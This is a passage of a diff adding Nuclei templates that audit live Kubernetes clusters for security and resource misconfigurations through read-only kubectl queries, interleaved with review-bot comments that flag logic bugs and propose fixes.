(!deployment.spec.template.spec.containers.some(container => container.resources && container.resources.requests && container.resources.requests.cpu)) { + let result = (`Deployment '${deployment.metadata.name}' in namespace '${deployment.metadata.namespace}' lacks CPU requests.`); + Export(result); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 4a0a00473045022100ce064fde6c02b2150739c4c898294016cbeabcf9da5ae8b4fce69862fb4c0b380220263897bc6d527e5e9ce91b2211864cbb8c373c2e1b168087d5b7b846704a067b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/poc/other/k8s-host-network-namespace-shared.yaml b/poc/other/k8s-host-network-namespace-shared.yaml new file mode 100644 index 0000000000..c254952267 --- /dev/null +++ b/poc/other/k8s-host-network-namespace-shared.yaml @@ -0,0 +1,48 @@ +id: k8s-host-network-namespace-shared + +info: + name: Host Network Namespace Sharing + author: princechaddha + severity: high + description: Checks if containers in Kubernetes Pods are configured to share the host's network namespace, which can lead to security risks. + impact: | + Sharing the host's network namespace allows containers to access the host network directly. This can lead to potential security breaches as containers might bypass network policies and gain unrestricted network access on the host. + remediation: | + Ensure that the 'hostNetwork' field is set to false in all Kubernetes Pods to prevent containers from sharing the host's network namespace. + reference: + - https://kubernetes.io/docs/concepts/policy/pod-security-policy/#host-namespaces + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,k8s,devsecops,namespace,k8s-cluster-security +flow: | + code(1); + for (let pod of template.items) { + set("pod", pod) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get pods --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + pod = JSON.parse(template.pod); + if (pod.spec.hostNetwork) { + let result = (`Pod '${pod.metadata.name}' in namespace '${pod.metadata.namespace}' is configured to share the host's network namespace.`); + Export(result); + } + extractors: + - type: dsl + dsl: + - response +# digest: 4a0a00473045022100d69f9d3352f6245cfa6f8e7d01fe74aa615f86848c9990dee3b7efed9888920e02202a7519d1ba3dc40214389af6146e1486832a051fba6fc79ae13ea45bece0f6ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/poc/other/k8s-host-pid-namespace-sharing.yaml b/poc/other/k8s-host-pid-namespace-sharing.yaml new file mode 100644 index 0000000000..385842e264 --- /dev/null +++ b/poc/other/k8s-host-pid-namespace-sharing.yaml @@ -0,0 +1,48 @@ +id: k8s-host-pid-namespace-sharing + +info: + name: Host PID Namespace Sharing + author: princechaddha + severity: critical + description: Checks if containers in Kubernetes pods share the host's process ID namespace, which can pose a security risk. + impact: | + Sharing the host's PID namespace allows processes within the pod to view all of the processes on the host, potentially leading to privilege escalation and other security vulnerabilities. + remediation: | + Ensure that the 'hostPID' field is set to 'false' in Kubernetes Pod specifications to prevent containers from sharing the host's PID namespace. + reference: + - https://kubernetes.io/docs/concepts/policy/pod-security-policy/#host-namespaces + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,k8s,devsecops,pods,k8s-cluster-security +flow: | + code(1); + for (let pod of template.items) { + set("pod", pod) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get pods --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + pod = JSON.parse(template.pod); + if (pod.spec.hostPID) { + let result = (`Pod '${pod.metadata.name}' in namespace '${pod.metadata.namespace}' is sharing the host's PID namespace.`); + Export(result); + } + extractors: + - type: dsl + dsl: + - response +# digest: 4b0a00483046022100b6c1a589b8b0530b22668279422d9e367506c2e5cbe53392b1e3871175a185300221008a9d26776f8f10fb9f5e02c5649df5da2f2e9b8dd61a6ff295abfba5a3d8f5b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/k8s-host-ports-check.yaml b/poc/other/k8s-host-ports-check.yaml new file mode 100644 index 0000000000..d84497df2f 
--- /dev/null +++ b/poc/other/k8s-host-ports-check.yaml @@ -0,0 +1,51 @@ +id: k8s-host-ports-check + +info: + name: Host ports should not be used + author: princechaddha + severity: medium + description: Checks Kubernetes Deployments to ensure they are not configured to use host ports, which can expose the host to potential security risks. + impact: | + Using host ports can compromise the isolation between the host and the containers, increasing the risk of unauthorized access to host resources. This can lead to security breaches. + remediation: | + Avoid using host ports in Kubernetes Deployments. Use services or other networking mechanisms to expose container applications. + reference: + - https://kubernetes.io/docs/concepts/services-networking/service/ + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,devsecops,deployments,k8s,k8s-cluster-security +flow: | + code(1); + for (let deployment of template.items) { + set("deployment", deployment) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[] | {name: .metadata.name, namespace: .metadata.namespace, containers: .spec.template.spec.containers}' + +javascript: + - code: | + let deploymentData = JSON.parse(template.deployment); + deploymentData.containers.forEach(container => { + if (container.ports && container.ports.some(port => port.hostPort)) { + let result = (`Deployment '${deploymentData.name}' in namespace '${deploymentData.namespace}' uses host ports.`); + Export(result); + } + }); + + extractors: + - type: dsl + dsl: + - response +# digest: 490a00463044022011532f20237cf541dbf6f961b6c194239b93619beb27129817c467cd266c48e90220338b47466ecff7995c0c920a541f2ec4bc5d7d062ddaf96260079033ceee08eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/poc/other/k8s-image-pull-policy-always.yaml b/poc/other/k8s-image-pull-policy-always.yaml new file mode 100644 index 0000000000..8832f533b7 --- /dev/null +++ b/poc/other/k8s-image-pull-policy-always.yaml 
@@ -0,0 +1,49 @@ +id: k8s-image-pull-policy-always + +info: + name: Image Pull Policy set to Always + author: princechaddha + severity: low + description: Ensures that Kubernetes deployments have the image pull policy set to 'Always', which guarantees the most up-to-date version of the image is used. + impact: | + Not setting the image pull policy to 'Always' may cause pods to use outdated versions of images, which can lead to security vulnerabilities if the images contain fixes or updates. + remediation: Update the image pull policy in Kubernetes Deployments to 'Always' to ensure that the latest container images are always used. + reference: + - https://kubernetes.io/docs/concepts/containers/images/#updating-images + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,k8s,devsecops,deployments,images,docker,k8s-cluster-security +flow: | + code(1); + for (let deployment of template.items) { + set("deployment",deployment) + javascript(1); + } + +self-contained: true + +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + deployment = JSON.parse(template.deployment); + if (!deployment.spec.template.spec.containers.every(container => container.imagePullPolicy === 'Always')) { + let result = (`Deployment '${deployment.metadata.name}' in namespace '${deployment.metadata.namespace}' does not have image pull policy set to Always.`); + Export(result); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 4a0a0047304502202f64c7e602834310b2e9a8c304d75b632cd1588374ae925560e396b61b209068022100c443b2a1a22e5404a2d851928394720efdbed1798415a186e6e0fef8f6001d83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/k8s-image-tag-not-fixed.yaml b/poc/other/k8s-image-tag-not-fixed.yaml new file mode 100644 index 0000000000..52c31ebadf --- /dev/null 
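Review bot: A container whose image is pinned by digest (`name@sha256:...`) is immutable regardless of pull policy, yet it is reported here whenever `imagePullPolicy` is not `Always`, which is a false positive that will push teams away from digest pinning; skipping such containers with `container => container.image.includes('@') || container.imagePullPolicy === 'Always'` inside the `every` predicate would avoid that. It may also be worth a comment in the template that the stored Deployment already carries the API-server default (`Always` for untagged or `:latest` images), so an absent field is not expected in the kubectl output.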
+++ b/poc/other/k8s-image-tag-not-fixed.yaml @@ -0,0 +1,53 @@ +id: k8s-image-tag-not-fixed + +info: + name: Image Tag should be fixed - not latest or blank + author: princechaddha + severity: low + description: Checks if Kubernetes Deployment container images are using tags other than 'latest' or blank, which can lead to unstable and unpredictable deployments. + impact: | + Using 'latest' or blank image tags can result in deploying non-reproducible container images, potentially leading to unexpected application behavior and difficulties in troubleshooting. + remediation: | + Use specific image tags for all containers in Kubernetes Deployments to ensure reproducibility and stability of application deployments. + reference: + - https://kubernetes.io/docs/concepts/containers/images/ + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,k8s,devsecops,deployments,k8s-cluster-security +flow: | + code(1); + for (let deployment of template.items) { + set("deployment",deployment) + javascript(1); + } + +self-contained: true + +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + deployment = JSON.parse(template.deployment); + deployment.spec.template.spec.containers.forEach(container => { + const tag = container.image.split(':').pop(); + if (tag === 'latest' || tag === '') { + let result = (`Deployment '${deployment.metadata.name}' in namespace '${deployment.metadata.namespace}' uses 'latest' or blank image tag for container '${container.name}'.`); + Export(result); + } + }); + + extractors: + - type: dsl + dsl: + - response +# digest: 4a0a0047304502204c105ff1b822e567af2ce98c74e1e13063716f81e3a93ab2a152fad3c6c58980022100ad676934438a11bcd3abfd6e00f12dd0f05fb4b1eb0dea56546bb3db994ded45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
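Review bot: `container.image.split(':').pop()` never yields an empty string for an untagged image such as `nginx` (it returns `nginx`), and for a registry with a port such as `registry.local:5000/app` it returns `5000/app`, so the "blank tag" branch is effectively dead and untagged images from ported registries are missed; the tag has to be taken from the last path segment only. Digest references (`app@sha256:...`) are also worth excluding explicitly, since they are the strongest form of pinning and should not be judged by their tag. The rewritten tag parsing below replaces the single `const tag = ...` line and the condition.
```yaml
javascript:
  - code: |
      deployment = JSON.parse(template.deployment);
      deployment.spec.template.spec.containers.forEach(container => {
        const image = container.image;
        const pinnedByDigest = image.includes('@');
        const lastSegment = image.substring(image.lastIndexOf('/') + 1);
        const tag = lastSegment.includes(':') ? lastSegment.split(':').pop() : '';
        if (!pinnedByDigest && (tag === 'latest' || tag === '')) {
          # … unchanged: Export of the finding message …
        }
      });
```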
diff --git a/poc/other/k8s-memory-limits-not-set.yaml b/poc/other/k8s-memory-limits-not-set.yaml new file mode 100644 index 0000000000..2735ea4225 --- /dev/null +++ b/poc/other/k8s-memory-limits-not-set.yaml @@ -0,0 +1,48 @@ +id: k8s-memory-limits-not-set + +info: + name: Memory limits not set in Deployments + author: princechaddha + severity: medium + description: Checks for missing memory limits in Kubernetes Deployments, which can lead to resource contention and instability + impact: | + Missing memory limits in Kubernetes Deployments can cause resource contention and potential application instability. + remediation: Set memory limits for all containers in Kubernetes Deployments to ensure resource management and application stability + reference: + - https://kubernetes.io/docs/tasks/configure-pod-container/assign-memory-resource/ + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,k8s,devsecops,deployments,k8s-cluster-security +flow: | + code(1); + for (let deployment of template.items) { + set("deployment",deployment) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + deployment = JSON.parse(template.deployment); + if (!deployment.spec.template.spec.containers.some(container => container.resources && container.resources.limits && container.resources.limits.memory)) { + let result = (`Deployment '${deployment.metadata.name}' in namespace '${deployment.metadata.namespace}' lacks memory limits.`); + Export(result); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 490a00463044022069a4646a0a3d856a79d0af6dc2b73cdd7b2835038feb1d5598a4f86577786994022063f8b629719eefe92da4c7c879e1828b087f04d37360ce743b62305d4f395730:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/poc/other/k8s-memory-requests-not-set.yaml b/poc/other/k8s-memory-requests-not-set.yaml new file mode 100644 index 0000000000..9e4b3474cf --- /dev/null +++ b/poc/other/k8s-memory-requests-not-set.yaml 
@@ -0,0 +1,48 @@ +id: k8s-memory-requests-not-set + +info: + name: Memory requests not set in Deployments + author: princechaddha + severity: medium + description: Checks for missing memory requests in Kubernetes Deployments, which can lead to inefficient scheduling and potential node resource exhaustion. + impact: | + Missing memory requests in Kubernetes Deployments can lead to inefficient pod scheduling, causing potential resource exhaustion on nodes. + remediation: Set memory requests for all containers in Kubernetes Deployments to ensure efficient pod scheduling and node resource utilization. + reference: + - https://kubernetes.io/docs/tasks/configure-pod-container/assign-memory-resource/ + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,k8s,devsecops,deployments,k8s-cluster-security +flow: | + code(1); + for (let deployment of template.items) { + set("deployment",deployment) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + deployment = JSON.parse(template.deployment); + if (!deployment.spec.template.spec.containers.some(container => container.resources && container.resources.requests && container.resources.requests.memory)) { + let result = (`Deployment '${deployment.metadata.name}' in namespace '${deployment.metadata.namespace}' lacks memory requests.`); + Export(result); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 4b0a00483046022100ae7c1c49b3e8f2afdad758ffeaea087dd5d811cf1b8183d2e4ee53b0dabdc51f0221009e2889066edaae078f4fdf8a31f77e108530839cdab907fa37589501d461773c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/k8s-minimize-added-capabilities.yaml b/poc/other/k8s-minimize-added-capabilities.yaml new file mode 100644 index 0000000000..783492dafa --- /dev/null 
+++ b/poc/other/k8s-minimize-added-capabilities.yaml 
@@ -0,0 +1,52 @@ +id: minimize-added-capabilities + +info: + name: Minimize container added capabilities + author: princechaddha + severity: high + description: Checks for containers in Kubernetes Deployments with added capabilities beyond the default set, increasing security risks. + impact: | + Containers with additional capabilities are granted more privileges than necessary, potentially allowing them to bypass intended security restrictions. This increases the risk of exploitation and unauthorized access. + remediation: | + Ensure that no unnecessary capabilities are added to containers within Kubernetes Deployments. Use security contexts to define the minimum necessary privileges. + reference: + - https://kubernetes.io/docs/tasks/configure-pod-container/security-context/ + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,k8s,devsecops,deployments,k8s-cluster-security +flow: | + code(1); + for (let deployment of template.items) { + set("deployment", deployment) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + deployment = JSON.parse(template.deployment); + for (const container of deployment.spec.template.spec.containers) { + if (container.securityContext && container.securityContext.capabilities && container.securityContext.capabilities.add && container.securityContext.capabilities.add.length > 0) { + let addedCaps = container.securityContext.capabilities.add.join(', '); + let result = (`Deployment '${deployment.metadata.name}' in namespace '${deployment.metadata.namespace}' has added capabilities: ${addedCaps}.`); + Export(result); + } + } + + extractors: + - type: dsl + dsl: + - response +# digest: 
4a0a00473045022100f45040f69d006ec672d4f4c04146b729cb7c5abcba703a8bbaa2da551013400202204e9b59dbad6d6e89badbb11aa795afa27f33eea1f026085e5f926675ac6cea68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/k8s-netpol-egress-rules.yaml b/poc/other/k8s-netpol-egress-rules.yaml new file mode 100644 index 0000000000..511c578f9f --- /dev/null +++ b/poc/other/k8s-netpol-egress-rules.yaml 
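Review bot: The template id is `minimize-added-capabilities` while the file is named `k8s-minimize-added-capabilities.yaml` and every sibling in this patch uses the `k8s-` prefix, so the id should be `id: k8s-minimize-added-capabilities` to keep `-id` filtering and reporting consistent. The loop also only walks `.spec.template.spec.containers`; init containers can carry `capabilities.add` as well and are never inspected, so iterating over `[...containers, ...(spec.initContainers || [])]` would make the finding complete. Since the finding lists the added capabilities, a comment noting that `NET_BIND_SERVICE` is commonly allowed by baseline policies and may deserve an allow-list would help triage.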
@@ -0,0 +1,48 @@ +id: k8s-netpol-egress-rules + +info: + name: Network policies define egress rules + author: princechaddha + severity: medium + description: Checks for network policies in Kubernetes that do not define egress rules, which can leave the network exposed to external threats. + impact: | + Lack of egress rules in network policies can result in unrestricted outbound network traffic, which may allow data exfiltration or unauthorized access to external services. + remediation: Define egress rules in all network policies to control outbound traffic from your Kubernetes pods, thereby reducing security risks. + reference: + - https://kubernetes.io/docs/concepts/services-networking/network-policies/ + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,devsecops,k8s,k8s-cluster-security +flow: | + code(1); + for (let policy of template.items) { + set("policy", policy) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get networkpolicies --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[] | {policy: .metadata.name, egress: .spec.egress}' + +javascript: + - code: | + let policyData = JSON.parse(template.policy); + if (!policyData.egress || policyData.egress.length === 0) { + let result = (`Network policy '${policyData.policy}' does not define egress rules.`); + Export(result); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 4a0a00473045022100cab8502b8046e7ecf04c896fd8367a118f6fa5f4a4b29b06f90a31e4c7e2bc910220761d406117dce7f3116e5426ad24d79d82a1e9e6161fa944fa8195c498144eda:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/k8s-netpol-namespace.yaml b/poc/other/k8s-netpol-namespace.yaml new file mode 100644 index 0000000000..9b23910f44 --- /dev/null +++ b/poc/other/k8s-netpol-namespace.yaml 
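Review bot: An empty or absent `spec.egress` does not mean egress is unrestricted: when `Egress` is listed in `spec.policyTypes`, an empty rule set is a deny-all egress policy, which is the most restrictive configuration and is reported here as a gap, while a policy that omits `Egress` from `policyTypes` imposes no egress restriction at all even if `egress` rules are present. The extractor should include `policyTypes: .spec.policyTypes` and the check should become `if (!policyData.policyTypes || !policyData.policyTypes.includes('Egress')) {`. The ingress counterpart k8s-network-ingress-rules in this patch has the same inversion, and there an empty `ingress` list (deny all inbound) is precisely the hardened state the description asks for.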
@@ -0,0 +1,49 @@ +id: k8s-netpol-namespace + +info: + name: Network Policies specify namespace + author: princechaddha + severity: medium + description: Checks for Kubernetes Network Policies that do not specify a namespace, which can lead to potential misconfigurations and security issues. + impact: | + Omitting the namespace in Network Policies can cause the policies to apply incorrectly, potentially exposing Kubernetes resources to unauthorized access. This poses a security risk by not isolating network traffic properly within the cluster. + remediation: | + Ensure that all Network Policies explicitly define a namespace to maintain proper network isolation and security boundaries. + reference: + - https://kubernetes.io/docs/concepts/services-networking/network-policies/ + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,devsecops,k8s,k8s-cluster-security +flow: | + code(1); + for (let policy of template.items) { + set("policy", policy) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get netpol --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[] | {policy: .metadata.name, namespace: .metadata.namespace}' + +javascript: + - code: | + let policyData = JSON.parse(template.policy); + if (!policyData.namespace) { + let result = (`Network Policy '${policyData.policy}' does not specify a namespace.`); + Export(result); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 4b0a00483046022100a7a99b20e705b40f456f020120dbdc38203e9c7f83d53b71bbc0af6797ee66260221009031e85d86065e75668a3ec1dfeb488792ceb00272ad63592f819e073d410d3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/k8s-network-ingress-rules.yaml b/poc/other/k8s-network-ingress-rules.yaml new file mode 100644 index 0000000000..749a61ba54 --- /dev/null +++ b/poc/other/k8s-network-ingress-rules.yaml 
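Review bot: NetworkPolicy is a namespaced resource, so every object returned by `kubectl get netpol --all-namespaces` has `.metadata.namespace` populated by the API server and the condition `if (!policyData.namespace)` can never be true; as written the template cannot produce a finding. If the intent is to catch manifests that omit `metadata.namespace` before they are applied, that is a static file check rather than a live-cluster check, and a comment saying which of the two is meant would prevent the template from being kept as a no-op.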
@@ -0,0 +1,49 @@ +id: k8s-network-ingress-rules + +info: + name: Define network ingress rules + author: princechaddha + severity: medium + description: Checks if Kubernetes network policies define specific ingress rules, which can help secure network communication within the cluster. + impact: | + Without specific ingress rules defined in network policies, unintended traffic may access pods within the Kubernetes cluster, increasing the risk of malicious activity. + remediation: | + Define specific ingress rules in all network policies to control the flow of inbound traffic to pods, ensuring only authorized traffic can access cluster resources. + reference: + - https://kubernetes.io/docs/concepts/services-networking/network-policies/ + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,security,k8s,k8s-cluster-security +flow: | + code(1); + for (let policy of template.items) { + set("policy", policy) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get networkpolicies --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[] | {policy: .metadata.name, ingress: .spec.ingress}' + +javascript: + - code: | + let policyData = JSON.parse(template.policy); + if (!policyData.ingress || policyData.ingress.length === 0) { + let result = `Network policy '${policyData.policy}' does not define any ingress rules.`; + Export(result); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 4a0a00473045022100d225b4ed37ec5deb1b364b52b2db205bffb08d4c712940221be0d4a24c471f75022025482dd2adbab336f0b0dda3ed30272390ddd93780dd1cd41d6f6e1ceea8e096:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/k8s-readiness-probe-not-set.yaml b/poc/other/k8s-readiness-probe-not-set.yaml new file mode 100644 index 0000000000..995932c545 --- /dev/null +++ b/poc/other/k8s-readiness-probe-not-set.yaml 
@@ -0,0 +1,49 @@ +id: k8s-readiness-probe-not-set + +info: + name: Readiness Probes not set in Deployments + author: princechaddha + severity: medium + description: Checks for missing readiness probes in Kubernetes Deployments, which can lead to traffic being sent to unready containers + impact: | + Not configuring readiness probes in Kubernetes Deployments can result in the routing of traffic to containers that are not ready to handle requests, leading to potential downtime or degraded performance. + remediation: | + Define readiness probes in all containers within your Kubernetes Deployments to ensure that traffic is only routed to containers that are fully prepared to handle it. + reference: + - https://kubernetes.io/docs/tasks/configure-pod-container/configure-liveness-readiness-startup-probes/ + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,k8s,devsecops,deployments,k8s-cluster-security +flow: | + code(1); + for (let deployment of template.items) { + set("deployment",deployment) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + deployment = JSON.parse(template.deployment); + if (!deployment.spec.template.spec.containers.some(container => container.readinessProbe)) { + let result = (`Deployment '${deployment.metadata.name}' in namespace '${deployment.metadata.namespace}' lacks readiness probes.`); + Export(result); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 4b0a00483046022100c6a0f6296b693f56a70b84b9c521f990219221bf26e0b04d4a77c1bd1a39799a022100ecc56b0184771d6ce9e5620bc111adbcd68cb0b1c8de331956e3804dbe355685:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/k8s-readonly-fs.yaml b/poc/other/k8s-readonly-fs.yaml new file mode 100644 index 0000000000..a44ec8a363 --- /dev/null 
+++ b/poc/other/k8s-readonly-fs.yaml @@ -0,0 +1,48 @@ +id: k8s-readonly-fs + +info: + name: Enforce Read-Only Filesystem for Containers + author: princechaddha + severity: critical + description: Checks for containers that do not use a read-only filesystem, which can prevent malicious write operations at runtime + impact: | + Not using a read-only filesystem can expose containers to risks of malicious modifications at runtime, compromising the container's integrity and security. + remediation: Configure containers to use read-only filesystems where possible to enhance security and minimize risk of unauthorized data modification + reference: + - https://kubernetes.io/docs/concepts/storage/volumes/#mount-propagation + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,k8s,devsecops,pods,k8s-cluster-security +flow: | + code(1); + for (let container of template.items) { + set("container", container) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get pods --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[].spec.containers[]' + +javascript: + - code: | + container = JSON.parse(template.container); + if (!container.securityContext || container.securityContext.readOnlyRootFilesystem !== true) { + let result = (`Container '${container.name}' in pod '${container.metadata.name}' in namespace '${container.metadata.namespace}' does not use a read-only filesystem.`); + Export(result); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 4b0a004830460221008d29bff5a9ee8436cbd007be3e8ea7d9adde22d7ba56b153dad3a298636f379e022100857902d59b4dc2849a6618197e3062762c537f08d7ff3b8b5c38e030bd054c2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/k8s-readonly-rootfs.yaml b/poc/other/k8s-readonly-rootfs.yaml new file mode 100644 index 0000000000..4d739c753c --- /dev/null +++ b/poc/other/k8s-readonly-rootfs.yaml 
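Review bot: The extractor emits bare container objects (`.items[].spec.containers[]`), which have no `metadata` field, so `container.metadata.name` in the message throws a TypeError for every non-compliant container and no finding is ever exported. Extracting the pod name and namespace alongside the container list, as the sibling templates do, fixes this and gives the finding a location; the rewritten extractor and script are below. This template also overlaps k8s-readonly-rootfs in the same patch, so one of the two should be dropped or their scopes stated in a comment.
```yaml
    extractors:
      - type: json
        name: items
        internal: true
        json:
          - '.items[] | {pod: .metadata.name, namespace: .metadata.namespace, containers: .spec.containers}'

javascript:
  - code: |
      let podData = JSON.parse(template.container);
      podData.containers.forEach(container => {
        if (!container.securityContext || container.securityContext.readOnlyRootFilesystem !== true) {
          let result = (`Container '${container.name}' in pod '${podData.pod}' in namespace '${podData.namespace}' does not use a read-only filesystem.`);
          Export(result);
        }
      });
    # … unchanged: dsl extractor …
```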
@@ -0,0 +1,51 @@ +id: k8s-readonly-rootfs + +info: + name: Pods with read-only root filesystem + author: princechaddha + severity: medium + description: Checks for pods and containers running with a read-only root filesystem to prevent modifications to the filesystem, enhancing security. + impact: | + Running containers with a read-only root filesystem ensures that applications are not able to write to the filesystem or modify existing content. This is a common security practice to prevent malicious changes. + remediation: | + Configure all pods and containers to have their root filesystem set to read-only mode. This can be achieved by setting the securityContext.readOnlyRootFilesystem parameter to true in the pod or container configuration. + reference: + - https://kubernetes.io/docs/concepts/policy/pod-security-policy/#volumes-and-file-systems + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,devsecops,pods,k8s,k8s-cluster-security +flow: | + code(1); + for (let pod of template.items) { + set("pod", pod) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get pods --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[] | {pod: .metadata.name, containers: .spec.containers}' + +javascript: + - code: | + let podData = JSON.parse(template.pod); + podData.containers.forEach(container => { + if (container.securityContext && container.securityContext.readOnlyRootFilesystem !== true) { + let result = (`Container '${container.name}' in pod '${podData.pod}' is not running with a read-only root filesystem.`); + Export(result); + } + }); + + extractors: + - type: dsl + dsl: + - response +# digest: 4a0a004730450221008ab8295b6fd005e8c2e6adf415bc1afd2e4bf13da1309b9a1294010cd823ffb5022051261a124e174fb71b23d17a6e1cc22aad6096bfd8b57d0d73370257f852890d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
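Review bot: The guard `container.securityContext && container.securityContext.readOnlyRootFilesystem !== true` skips any container that has no `securityContext` at all, which is the common non-compliant case (the root filesystem is writable unless that field is set). The condition should be `if (!container.securityContext || container.securityContext.readOnlyRootFilesystem !== true) {`, which is how the k8s-readonly-fs hunk writes it. The `name`/`description` ("Pods with read-only root filesystem", "Checks for pods ... running with a read-only root filesystem") describe the compliant state while the template reports the non-compliant one; `Pods without read-only root filesystem` would match what is exported. The k8s-root-user-id hunk uses the same `container.securityContext &&` guard shape.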
diff --git a/poc/other/k8s-root-user-id.yaml b/poc/other/k8s-root-user-id.yaml new file mode 100644 index 0000000000..33f738f4d4 --- /dev/null +++ b/poc/other/k8s-root-user-id.yaml @@ -0,0 +1,50 @@ +id: k8s-root-user-id + +info: + name: Pods run with root user ID + author: princechaddha + severity: low + description: Checks for pods running with the user ID of the root user, increasing security risks. + impact: | + Running pods with the root user ID can allow malicious entities to gain unnecessary privileges, leading to potential compromises in the Kubernetes environment. + remediation: Configure pods to run with a non-root user ID by setting the 'securityContext' for each container and the pod itself. + reference: + - https://kubernetes.io/docs/tasks/configure-pod-container/security-context/ + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,devsecops,pods,k8s,k8s-cluster-security +flow: | + code(1); + for (let pod of template.items) { + set("pod", pod) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get pods --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[] | {pod: .metadata.name, containers: .spec.containers}' + +javascript: + - code: | + let podData = JSON.parse(template.pod); + podData.containers.forEach(container => { + if (container.securityContext && container.securityContext.runAsUser === 0) { + let result = (`Container '${container.name}' in pod '${podData.pod}' is running with root user ID.`); + Export(result); + } + }); + + extractors: + - type: dsl + dsl: + - response +# digest: 4a0a004730450220517a362ea6e79742e15c12dcf13275a23e3507c4a8c72f25f0a5620100cce53a022100d04b0c6d1bf0da1801dc9c6c9bea05701fa7e0e43570cd5b8ad9fb90294aa44c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/k8s-seccomp-profile-set.yaml b/poc/other/k8s-seccomp-profile-set.yaml new file mode 100644 index 0000000000..5b68f028c4 
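Review bot: Only a container whose own `securityContext.runAsUser` is literally `0` is reported; a container with no `runAsUser` (and no `runAsNonRoot: true`) at container or pod level runs as whatever UID the image defines, frequently root, and a pod-level `spec.securityContext.runAsUser: 0` is not even extracted by the jq filter. If the intent is the stricter policy the remediation text describes ("setting the 'securityContext' for each container and the pod itself"), extract the pod security context too and evaluate the effective setting per container, as sketched below; if the intent is only the explicit-zero case, the description should say so.
```yaml
        - '.items[] | {pod: .metadata.name, podSecurityContext: .spec.securityContext, containers: .spec.containers}'
# … unchanged: javascript block header …
      let podData = JSON.parse(template.pod);
      let podCtx = podData.podSecurityContext || {};
      podData.containers.forEach(container => {
        let ctx = container.securityContext || {};
        let uid = ctx.runAsUser !== undefined ? ctx.runAsUser : podCtx.runAsUser;
        let nonRoot = ctx.runAsNonRoot !== undefined ? ctx.runAsNonRoot : podCtx.runAsNonRoot;
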